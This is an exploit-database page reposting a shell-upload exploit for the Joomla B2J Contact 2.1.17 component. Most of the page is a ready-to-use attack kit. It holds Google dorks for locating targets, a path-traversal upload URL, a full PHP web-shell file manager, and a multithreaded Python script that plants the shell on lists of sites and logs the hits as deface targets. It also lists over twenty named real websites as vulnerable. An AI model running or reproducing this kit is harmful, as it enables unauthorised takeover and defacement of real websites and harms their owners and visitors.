Joomla Codextrous Com_B2jcontact Components 2.1.17 Shell Upload Vulnerability
CVE
Category
Price
Severity
CVE-2017-9030
CWE-264
Not specified
High
Author
Risk
Exploitation Type
Date
Not specified
High
Remote
2019-01-09
CPE
cpe:cpe:/a:joomla:codextrous_com_b2jcontact:2.1.17
CVSS vector description
Metric
Value
Metric Description
Value Description
Attack vector Network AV The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230). Attack Complexity High AC The successful attack depends on the evasion or circumvention of security-enhancing techniques in place that would otherwise hinder the attack. These include: Evasion of exploit mitigation techniques. The attacker must have additional methods available to bypass security measures in place. For example, circumvention of address space randomization (ASLR) or data execution prevention must be performed for the attack to be successful. Obtaining target-specific secrets. The attacker must gather some target-specific secret before the attack can be successful. A secret is any piece of information that cannot be obtained through any amount of reconnaissance. To obtain the secret the attacker must perform additional attacks or break otherwise secure measures (e.g. knowledge of a secret key may be needed to break a crypto channel). This operation must be performed for each attacked target. Privileges Required None PR The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack. Scope Unchanged S An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances. Confidentiality High C There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data. Integrity High I There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system. Availability High A There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019010071 Below is a copy:
Joomla Codextrous Com_B2jcontact Components 2.1.17 Shell Upload Vulnerability #################################################################################################
# Exploit Title : Joomla Codextrous Com_B2jcontact Components 2.1.17 Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 09/01/2019
# Vendor Homepage : codextrous.com/joomla-components/b2j-contact.html
+ extensions.joomla.org/extension/b2j-contact/
# Software Download Link :
codextrous.com/joomla-components/b2j-contact.html?utm_source=jed&utm_medium=download&utm_campaign=b2jcontact
# Software Price : 29$
# Version Information : 2.1.17
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ]
+ CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# CVE-Details => CVE-2017-9030 - CVE-2017-5215 - CVE-2017-5214
# Cyberizm Exploit Reference Link :
cyberizm.org/cyberizm-joomla-codextrous-com-b2jcontact-shell-upload-exploit.html
# Exploit4Arab Reference Link :
exploit4arab.org/exploits/2098
# PacketStormSecurity Exploit Reference Link :
packetstormsecurity.com/files/151029/Joomla-Codextrous-B2jcontact-2.1.17-Shell-Upload.html
#################################################################################################
# Description : B2J Contact is one of the most popular extension
of Codextrous which is used for create Contact forms.
This revolutionary, multi-functional Joomla! contact form component is super easy-to-install,
that brings you the ultimate in User Experience with its clean design and user friendly backend.
You can create as many contact forms as you want.
You can create a contact form and to display it you create its menu as well.
B2J Contact component comes with a module also, by which you can display
contact form where ever you want.
B2J Contact has got the following main options which users may customize:
Basic Option - Default Fields - Dynamic Fields - Events - Security
Each section on its own opens up great custom options/fields for you to play with
to get your contact form up and running smoothly. Despite its enormous functionality,
B2J Contact Component is extremely lightweight with an amazing design.
Whether you are making an online survey or simply creating another contact form,
B2J Contact Component is there to help you!
B2J Contact comes with all the below mentioned key features and more:
Joomla! 3.0 Support - In-buit Form Builder -
Access to extension support system - All features shown on the Demo
#################################################################################################
# Google Dorks :
inurl:''/index.php?option=com_b2jcontact''
inurl:''/components/com_b2jcontact/''
intext:''Another Great Website by One Spot Media.''
intext:''Bootstrap is a front-end framework of Twitter, Inc. Code licensed under MIT License.
Font Awesome font licensed under SIL OFL 1.1.''
intext:''POWERED BY VISUALPROJECT WEB''
intext:'' 2013-2014 Opentec SRL, tutti i diritti riservati.''
intext:''honlap: rosko.hu''
+There are more dorks. Use your brain to find more.
# Exploit :
/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah
# Error displaying on the page [ Error Language changes according to the country ] :
{"error":"File is empty."}
{"error":"No files were uploaded."}
{"error":"null."}
{"error":"Keine Dateien hochgeladen."}
# Uploaded File Path : /components/com_b2jcontact/.....
# Allowed File Extensions : .php .php5 .html .txt .jpg .jpeg .gif .png .xml .pdf and other extensions.
# Use Auto Exploiter Tool for this Vulnerability.
#################################################################################################
# Auto Exploitation Tool Python =>
import requests as r
import argparse as arg
import os, sys
import urllib2,urllib,re
from multiprocessing import Pool
from multiprocessing.dummy import Pool as ThreadPool
from urlparse import urlparse
import random, string
#Coded By KingSkrupellos
#Cyberizm Digital Security Team
def wibu(length):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(length))
shell = """
<?php function fUUPd($NVAR)
{
$NVAR=gzinflate(base64_decode($NVAR));
for($i=0;$i<strlen($NVAR);$i++)
{
$NVAR[$i] = chr(ord($NVAR[$i])-1);
}
return $NVAR;
<?php
set_time_limit(0);
error_reporting(0);
if(get_magic_quotes_gpc()){
foreach($_POST as $key=>$value){
$_POST[$key] = stripslashes($value);
}
}
echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">
<title> CyBeRizM Dosya Yneticisi Sh3LL </title>
<center><img src="http://i.hizliresim.com/3vnXyj.gif"></center>
<style>
body{
font-family: "Racing Sans One", cursive;
background-color: #e6e6e6;
text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
background-color: #636263;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: silver;
}
#content .first:hover{
background-color: silver;
text-shadow:0px 0px 1px #757575;
}
table{
border: 1px #000000 dotted;
}
H1{
font-family: "Rye", cursive;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</HEAD>
<BODY>
<H1><center> Cyberizm.Org / KingSkrupellos </center></H1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Nerde miyim? : ';
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<a href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
echo '</td></tr><tr><td>';
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo '<font color="green">Dosya Yklendi</font><br />';
}else{
echo '<font color="red">Dosya Yklenemedi</font><br />';
}
}
echo '<form enctype="multipart/form-data" method="POST">
Dosya Ykle : <input type="file" name="file" />
<input type="submit" value="Ykle" />
</form>
</td></tr>';
if(isset($_GET['filesrc'])){
echo "<tr><td>Current File : ";
echo $_GET['filesrc'];
echo '</tr></td></table><br />';
echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo '<font color="green">Tamamdr!</font><br />';
}else{
echo '<font color="red">Malesef!</font><br />';
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>';
}elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '<font color="green">Kaydedildi.</font><br />';
}else{
echo '<font color="red">Kaydedilemedi.</font><br />';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>';
}elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '<font color="green">Kaydedildi.</font><br />';
}else{
echo '<font color="red">Kaydedilemedi.</font><br />';
}
fclose($fp);
}
echo '<form method="POST">
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Go" />
</form>';
}
echo '</center>';
}else{
echo '</table><br /><center>';
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '<font color="green">Kaydedildi</font><br />';
}else{
echo '<font color="red">Malesef</font><br />';
}
}elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo '<font color="green">Silindi.</font><br />';
}else{
echo '<font color="red">Silinemedi.</font><br />';
}
}
}
echo '</center>';
$scandir = scandir($path);
echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>Dosya Ad</center></td>
<td><center>Boyut</center></td>
<td><center>zinler</center></td>
<td><center>Ayarlar</center></td>
</tr>';
foreach($scandir as $dir){
if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
echo "<tr>
<td><a href=\"?path=$path/$dir\">$dir</a></td>
<td><center>--</center></td>
<td><center>";
if(is_writable("$path/$dir")) echo '<font color="green">';
elseif(!is_readable("$path/$dir")) echo '<font color="red">';
echo perms("$path/$dir");
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Sil</option>
<option value=\"chmod\">Dizin Yeri </option>
<option value=\"rename\">Ad Deitir</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<input type=\"submit\" value=\">\" />
</form></center></td>
</tr>";
}
echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
foreach($scandir as $file){
if(!is_file("$path/$file")) continue;
$size = filesize("$path/$file")/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).' MB';
}else{
$size = $size.' KB';
}
echo "<tr>
<td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td><center>".$size."</center></td>
<td><center>";
if(is_writable("$path/$file")) echo '<font color="green">';
elseif(!is_readable("$path/$file")) echo '<font color="red">';
echo perms("$path/$file");
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Sil</option>
<option value=\"chmod\">Dizin</option>
<option value=\"rename\">Ad Deitir</option>
<option value=\"edit\">Dzenle</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<input type=\"submit\" value=\">\" />
</form></center></td>
</tr>";
}
echo '</table>
</div>';
}
echo '<br />Only belongs to KingSkrupellos </font>, Recoded By <font color="red">KingSkrupellos / Cyberizm.Org |</font><br />Bilgi: <font color="red">http://www.cyberizm.org/</font>
</BODY>
</HTML>';
function perms($file){
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
?>"""
def Fox_Contact(url):
if url[-1] != "/":
url = site + "/"
if url[:7] != "http://" and url[:8] != "https://":
url = "http://" + url
return url
user_agent = {'User-agent': 'Mozilla/5.0'}
try :
Filelist = open(sys.argv[1], 'r').readlines()
for i in Filelist:
try:
url=i.strip()
urlpa = urlparse(url)
site = urlpa.netloc
site=Fox_Contact(url)
print "[#]Url:"+site
req = urllib2.Request(url)
opreq = urllib2.urlopen(req).read()
b2jcomids = re.findall('<a name="b2jcomid_(.*?)"></a>',opreq)
print "[+]Exploiting b2jcomid"
for b2jcomid in b2jcomids:
b2jcomid=str(b2jcomid)
print "[#]b2jcomid:"+b2jcomid
halah = str("common.php")
b0x_dir = [("index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah)]
diretorios=0
for diretorio in b0x_dir:
diretorios += 1
url_vuln = site + diretorio
shell_dir = site + "/components/com_b2jcontact/"+halah+"?ina"
checa_site = r.get(url_vuln, headers=user_agent)
if '{"' in checa_site.text:
print( "\n[!] exploiting in {}...".format(diretorios))
envia_shell = r.post(url_vuln, data=shell, headers=user_agent)
verifica_shell = r.get(shell_dir, headers=user_agent)
if "Cwd:" in verifica_shell.text:
a = open('Attacker.txt','a')
a.write(shell_dir+'\n')
print( "\n[*]Good 1 ")
print( "[+] deface dir "+shell_dir)
else:
print("shell Upload *_* : ", shell_dir)
else:
print("\n[-] Fuck Sites : {}.".format(diretorios))
except Exception as ex :
print "[#]Fuck Site !~! "
pool = ThreadPool(10)
pool.map(Fox_Contact, Filelist)
pool.close()
pool.join()
except :
print "[+] You not inputing list file"
#################################################################################################
CVE Details =>
cvedetails.com/vulnerability-list/vendor_id-16496/product_id-37996/Codextrous-B2j-Contact.html
CVE-2017-9030
The Codextrous B2J Contact (aka b2j_contact) extension before 2.1.13 for Joomla!
allows a directory traversal attack that bypasses a uniqid protection mechanism,
and makes it easier to read arbitrary uploaded files.
CVE-2017-5215
The Codextrous B2J Contact (aka b2j_contact) extension before 2.1.13 for Joomla!
allows a rename attack that bypasses a "safe file extension" protection mechanism,
leading to remote code execution.
CVE-2017-5214
The Codextrous B2J Contact (aka b2j_contact) extension before 2.1.13 for Joomla!
allows prediction of a uniqid value based on knowledge of a time value.
This makes it easier to read arbitrary uploaded files.
#################################################################################################
# Original Reference Link By KingSkrupellos => cyberizm.org/cyberizm-joomla-codextrous-com-b2jcontact-shell-upload-exploit.html
#################################################################################################
Another Exploiter Tool Python Coded
[ If another exploit don't work - use this - Only Shell Code Changed ] ghostbin.com/paste/psoza - archive.is/sDumw
#################################################################################################
# Example Vulnerable Sites :
[+] garrhotel.com/welcome/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"%20halah&lang=en
{"error":"File is empty."}
{"error":null}
[+] nuovaestetica.it/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah
{"error":"File is empty."}
{"error":null}
[+] masthamnsoperan.se/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah
{"error":"File is empty."}
{"error":null}
[+] raiffeisen-schwaben-allgaeu.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah
{"error":"File is empty."}
{"error":null}
[+] best-sl.fr/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah
{"error":"File is empty."}
{"error":null}
[+] lsvgz.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"%20halah&lang=en
{"error":"File is empty."}
{"error":null}
[+] strand-catering.com/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah
{"error":"File is empty."}
{"error":null}
[+] drtoldilaszlo.hu/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22+halah
{"error":"File is empty."}
{"error":null}
[+] kleintierverhalten.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22+halah
{"error":"File is empty."}
{"error":null}
[+] infortelematica.it/site/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah
{"error":"File is empty."}
{"error":null}
[+] cosmo-homes.com/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah
{"error":"File is empty."}
{"error":null}
[+] hotelcorona.fg.it/joomla/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah
{"error":"File is empty."}
{"error":null}
[+] hotelruas.net/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"%20halah&lang=en
{"error":"File is empty."}
{"error":null}
[+] osteriasantatrinita.it/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah
{"error":"File is empty."}
{"error":null}
[+] insentis.com/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22+halah
{"error":"File is empty."}
[+] ristorantepizzeriasanmartino.net/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22%20halah&lang=en
{"error":"File is empty."}
{"error":null}
[+] wukrohr.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22+halah
{"error":"File is empty."}
{"error":null}
[+] hubico.ch/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22%20halah&lang=en
{"error":"File is empty."}
{"error":null}
[+] vr-lagerhaus-obb-so.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22%20halah&lang=en
{"error":"File is empty."}
{"error":null}
[+] mercuriuscatering.nl/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22%20halah&lang=en
{"error":"File is empty."}
{"error":null}
[+] rwg-essenbach.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22%20halah&lang=en
{"error":"File is empty."}
{"error":null}
[+] liaisonsante.com/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22+halah
{"error":"File is empty."}
{"error":null}
+ Proof of Concept for the Vulnerability : archive.li/rjRKz
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use .